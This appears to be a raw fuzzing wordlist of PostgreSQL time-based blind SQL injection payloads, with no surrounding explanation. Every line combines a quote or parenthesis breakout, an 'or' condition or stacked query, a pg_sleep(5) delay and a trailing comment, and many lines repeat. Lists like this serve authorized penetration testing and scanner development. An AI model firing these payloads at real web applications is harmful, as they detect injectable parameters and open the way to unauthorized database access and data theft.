pg_sleep(5)--
1+or+pg_sleep(5)--
"+or+pg_sleep(5)--
'+or+pg_sleep(5)--
1)+or+pg_sleep(5)--
")+or+pg_sleep(5)--
')+or+pg_sleep(5)--
1))+or+pg_sleep(5)--
"))+or+pg_sleep(5)--
'))+or+pg_sleep(5)--
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or+pg_SLEEP(5)
or+pg_SLEEP(5)--
or+pg_SLEEP(5)#
pg_sleep(5)--
1+or+pg_sleep(5)--
"+or+pg_sleep(5)--
'+or+pg_sleep(5)--
';SELECT+PG_SLEEP(5)--
1)+or+pg_sleep(5)--
")+or+pg_sleep(5)--
')+or+pg_sleep(5)--
1))+or+pg_sleep(5)--
"))+or+pg_sleep(5)--
'))+or+pg_sleep(5)--
pg_SLEEP(5)
pg_SLEEP(5)--
pg_SLEEP(5)#
or+pg_SLEEP(5)
or+pg_SLEEP(5)--
or+pg_SLEEP(5)#
1)+or+pg_sleep(5)--
pg_sleep(5)--
+or+pg_sleep(5)--"
1))+or+pg_sleep(5)--
+or+pg_sleep(5)--
)+or+pg_sleep(5)--
")+or+pg_sleep(5)--
1+or+pg_sleep(5)--
))+or+pg_sleep(5)--
))+or+pg_sleep(5)--"